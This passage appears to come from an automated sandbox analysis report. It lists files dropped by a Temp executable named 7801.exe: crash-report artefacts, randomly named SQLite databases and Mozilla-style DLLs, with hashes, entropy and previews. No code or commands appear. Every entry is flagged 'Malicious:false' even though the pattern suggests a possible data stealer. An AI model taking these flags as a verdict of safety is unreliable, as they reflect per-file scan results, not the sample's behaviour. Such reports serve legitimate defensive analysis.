                                                                                                                                                                                                        Entropy (8bit):2.6982673798413264
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:9GiZYWzRIskYeYAWjqhHX+YEZCLtbimPZrZwhe22zaHjLcO3mIWy3:9jZD45yqnueTaHjLcO3hWy3
                                                                                                                                                                                                        MD5:1E3428F52B7045A77CFD7B0166F40F77
                                                                                                                                                                                                        SHA1:25F5A37E4DBE6DDCB22043B7284BAFCDA1645610
                                                                                                                                                                                                        SHA-256:B011C6766F78C6D95F95404ED5D3BF04BF9875F733ACE46F7641FDE96D27EFF6
                                                                                                                                                                                                        SHA-512:F2C9711D92BAD9C0EFA1B085C08913886B3E39BEAAF2ADE00ABAF4E0092BBDBECD4063EB5E91B89216E802565ED222E93840476860AF62B4CAAAA8C35A4EE43D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER5EAC.tmp.csv
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):54386
                                                                                                                                                                                                        Entropy (8bit):3.0523324327765002
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:/1HBybnA6sgK/x2PRj2nzhmRd1TuOc+3MSi:/1HBybnA6sgK/x2PRj2nzhmRd1TuD+3Y
                                                                                                                                                                                                        MD5:9E2A4C710BF0EF1AB96E0FBC83A94F97
                                                                                                                                                                                                        SHA1:451F103D667B3BC780C511CCC5A517F2E941BDD1
                                                                                                                                                                                                        SHA-256:25A919E83C233B48D3BE7CAFE118537F38C5F1E51868109C002E9ABD7F0DF830
                                                                                                                                                                                                        SHA-512:CAD7424179BF5EA01535947342D5517A6F9A4F5D1BA52E5D61F199145B1D5FF844A0885932C9D91C95DBCBC3C27772D359D15F518BFEA9E5E6774B049E20EC77
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER62F3.tmp.txt
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                        Entropy (8bit):2.6960340998589127
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:9GiZYWUwJQffYfYkWjqv8HlYEZ+ct6iPPIc+Wwn64k7/aXURiRj6IKx3:9jZDAYWqvhF6P/aXURiRjtKx3
                                                                                                                                                                                                        MD5:7AF93D6F1A0032753A596F52EFCD1423
                                                                                                                                                                                                        SHA1:651104BA14D35EEB3171D1274F415351F61A623B
                                                                                                                                                                                                        SHA-256:39FAFCCC867A221D859CC815615344DE9CFF040779FEB82EE10566D0A96961B3
                                                                                                                                                                                                        SHA-512:C1B52BF2ED2D5EA3627C0BECD3A65121590843EEB6088A7FFFFE8600D7AC9872773A266998C5D61AD9D17871E3D79FA9E3718957813590036C64081B98923A5E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6FE.tmp.dmp
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Thu Jan 13 23:15:23 2022, 0x1205a4 type
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):42152
                                                                                                                                                                                                        Entropy (8bit):2.0055914487492963
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:nf+MTOf4LTvbOeh0k3O+Kyx1BQU+A8TxB1NCUVgyT85OtEGVP:oWieeHVLFuG5
                                                                                                                                                                                                        MD5:2A644774142729880A64441FCAE80948
                                                                                                                                                                                                        SHA1:3416A4D49E064E9D094FE99D1EB58DDE93630F17
                                                                                                                                                                                                        SHA-256:82AB2AD8EB0BB51F5B97E9F0FB3875BA4D6C6590267D95664C1F483C055AD5DD
                                                                                                                                                                                                        SHA-512:36B63A7E203E949B9798C0EE669014EE470A24FA2293995CE765DB5704E7D55C43390A2F7EBE4CEDCA9B07AD45894449F8E937E3FF993F9F850E859A208A1528
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MDMP....... ..........a....................................4...v(..........T.......8...........T...........................x...........d....................................................................U...........B..............GenuineIntelW...........T.......|......a.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD49.tmp.WERInternalMetadata.xml
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8392
                                                                                                                                                                                                        Entropy (8bit):3.701438796962995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Rrl7r3GLNihr6n6YrPSUjgmfORSNQa+pDi89bQssfKwm:RrlsNid6n6YDSUjgmfORS6Q/f8
                                                                                                                                                                                                        MD5:66F461C0EC0330D64B5D27D1E42648D3
                                                                                                                                                                                                        SHA1:F6F499237FE73C3A8B7B53D0EA42F47F6A0E5631
                                                                                                                                                                                                        SHA-256:E7CA29D3A434B2ED3E585CA292AA9A055860117EB9423D0945F16F136301375A
                                                                                                                                                                                                        SHA-512:98F0238DD3C54F793BDB14C75935EC1255A197EB6B608F38F567A3A42FFA75C7A6D935BB22F7E00C1CB18E38539693FE61D2FBC968413E7AA53CE641C2656353
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.5.6.<./.P.i.d.>.......
                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERE103.tmp.xml
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4685
                                                                                                                                                                                                        Entropy (8bit):4.475981505955246
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cvIwSD8zsCJgtWI9XfWSC8BZ8fm8M4JZ8qFcfi+q8vh8R6gxdAOHS3d:uITfQ0OSNoJiiKREAOHS3d
                                                                                                                                                                                                        MD5:867BAA274A448D5C6FE96CE722E9FF4A
                                                                                                                                                                                                        SHA1:353CF987A6D75C60C49B186B123D89FBF891B6EA
                                                                                                                                                                                                        SHA-256:ECBECDDA4BE1B31B50F5B1D2AA05A0CAA15C954398FCD4E2DE76BA658B507E7B
                                                                                                                                                                                                        SHA-512:0CA515EAA2FED710FF3751D4D9EA6404DE814073C3B8C414087A447A64D64A3D3A408F2139B4972692E3AD04CA034A1891962BC35DB1F08942EEEEE3FC548A17
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1341146" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\1xVPfvJcrg
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                                                        Entropy (8bit):1.1874185457069584
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\RYwTiizs2t
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                                                        Entropy (8bit):1.1874185457069584
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\frAQBc8Wsa
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                        Entropy (8bit):0.792852251086831
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\rQF69AzBla
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                        Entropy (8bit):0.7006690334145785
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                                                                                                                                        MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                                                                                                                                        SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                                                                                                                                        SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                                                                                                                                        SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):123344
                                                                                                                                                                                                        Entropy (8bit):6.504957642040826
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:DkO/6RZFrpiS7ewflNGa35iOrjmwWTYP1KxBxZJByEJMBrsuLeLsWxcdaocACs0K:biRZFdBiussQ1MBjq2aocts03/7FE
                                                                                                                                                                                                        MD5:F92586E9CC1F12223B7EEB1A8CD4323C
                                                                                                                                                                                                        SHA1:F5EB4AB2508F27613F4D85D798FA793BB0BD04B0
                                                                                                                                                                                                        SHA-256:A1A2BB03A7CFCEA8944845A8FC12974482F44B44FD20BE73298FFD630F65D8D0
                                                                                                                                                                                                        SHA-512:5C047AB885A8ACCB604E58C1806C82474DC43E1F997B267F90C68A078CB63EE78A93D1496E6DD4F5A72FDF246F40EF19CE5CA0D0296BBCFCFA964E4921E68A2F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y.Z.............x.......x.......x......=z......=z......=z.......x.......x..........z.../{....../{....../{....../{b...../{......Rich............PE..L...C@.\.........."!.................b.......0......................................~p....@.................................p...........h...........................0...T................... ...........@............0..$............................text...7........................... ..`.orpc........ ...................... ..`.rdata...y...0...z..................@..@.data...............................@....rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):26064
                                                                                                                                                                                                        Entropy (8bit):5.981632010321345
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:KuAjyb0Xc6JzVuLoW2XDOc3TXg1hjsvDG8A3OPLon07zS:BEygs6RV6oW2Xd38njiDG8Mj
                                                                                                                                                                                                        MD5:A7FABF3DCE008915CEE4FFC338FA1CE6
                                                                                                                                                                                                        SHA1:F411FB41181C79FBA0516D5674D07444E98E7C92
                                                                                                                                                                                                        SHA-256:D368EB240106F87188C4F2AE30DB793A2D250D9344F0E0267D4F6A58E68152AD
                                                                                                                                                                                                        SHA-512:3D2935D02D1A2756AAD7060C47DC7CABBA820CC9977957605CE9BBB44222289CBC451AD331F408317CF01A1A4D3CF8D9CFC666C4E6B4DB9DDD404C7629CEAA70
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S......U...U...U...U...U..T...U..T...U..T...U..T...U5.T...U...U!..U..T...U..T...U...U...U..T...URich...U........PE..L...<@.\.........."!.........8......0........0.......................................7....@..........................=......0>..x....`...............H..........<...09..T............................9..@............0...............................text...f........................... ..`.orpc........ ...................... ..`.rdata.......0......................@..@.data...@....P.......(..............@....rsrc........`.......*..............@..@.reloc..<............D..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):70608
                                                                                                                                                                                                        Entropy (8bit):5.389701090881864
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:3n8PHF564hn4wva3AVqH5PmE0SjA6QM0avrDG8MR43:38th4wvaQVE5PRl0xs
                                                                                                                                                                                                        MD5:5243F66EF4595D9D8902069EED8777E2
                                                                                                                                                                                                        SHA1:1FB7F82CD5F1376C5378CD88F853727AB1CC439E
                                                                                                                                                                                                        SHA-256:621F38BD19F62C9CE6826D492ECDF710C00BBDCF1FB4E4815883F29F1431DFDA
                                                                                                                                                                                                        SHA-512:A6AB96D73E326C7EEF75560907571AE9CAA70BA9614EB56284B863503AF53C78B991B809C0C8BAE3BCE99142018F59D42DD4BCD41376D0A30D9932BCFCAEE57A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~.....K...K...K.g.K...K4}.J...K4}.J...K4}.J...K4}.J...K...J...K...J...K...K...K&|.J...K&|.J...K&|uK...K&|.J...KRich...K........PE..L...J@.\.........."!.................$.......0...............................0............@.........................0z.......z...........v................... .......u..T...........................Hv..@............0...............................orpc...t........................... ..`.text........ ...................... ..`.rdata...Q...0...R..................@..@.data................j..............@....rsrc....v.......x...t..............@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):19920
                                                                                                                                                                                                        Entropy (8bit):6.2121285323374185
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
                                                                                                                                                                                                        MD5:7CD244C3FC13C90487127B8D82F0B264
                                                                                                                                                                                                        SHA1:09E1AD17F1BB3D20BD8C1F62A10569F19E838834
                                                                                                                                                                                                        SHA-256:BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
                                                                                                                                                                                                        SHA-512:C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7801.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):117712
                                                                                                                                                                                                        Entropy (8bit):6.598338256653691
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:9b9ffsTV5n8cSQQtys6FXCVnx+IMD6eN07e:P25V/QQs6WTMex7e
                                                                                                                                                                                                        MD5:A436472B0A7B2EB2C4F53FDF512D0CF8
                                                                                                                                                                                                        SHA1:963FE8AE9EC8819EF2A674DBF7C6A92DBB6B46A9
                                                                                                                                                                                                        SHA-256:87ED943D2F06D9CA8824789405B412E770FE84454950EC7E96105F756D858E52
                                                                                                                                                                                                        SHA-512:89918673ADDC0501746F24EC9A609AC4D416A4316B27BF225974E898891699B630BB18DB32432DA2F058DC11D9AF7BAF95D067B29FB39052EE7C6F622718271B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
